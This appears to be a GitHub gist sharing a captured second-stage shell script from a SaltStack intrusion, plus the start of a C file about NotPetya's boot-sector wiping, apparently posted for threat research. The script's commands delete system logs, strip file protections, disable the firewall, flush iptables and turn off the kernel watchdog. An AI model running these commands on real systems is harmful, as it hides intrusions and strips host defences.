olliencc
/ Salt Stack Second Stage from 217.12.210.192
Created
May 3, 2020 09:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /bin/sh | |
| ulimit -n 65535 | |
| rm -rf /var/log/syslog | |
| chattr -iua /tmp/ | |
| chattr -iua /var/tmp/ | |
| ufw disable | |
| iptables -F | |
| echo "nope" >/tmp/log_rot | |
| sudo sysctl kernel.nmi_watchdog=0 | |
| echo '0' >/proc/sys/kernel/nmi_watchdog |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| // | |
| // The mysterious command (0x2E214B44) results in the first 10 sectors being wiped out.Or if the original replaceBootSectors() function fails. | |
| // | |
| // 0x2E214B44 ??? => Mysterious process. Name very close to AVP.exe | |
| // Source of below hashes: https://www.carbonblack.com/2017/06/28/carbon-black-threat-research-technical-analysis-petya-notpetya-ransomware/ |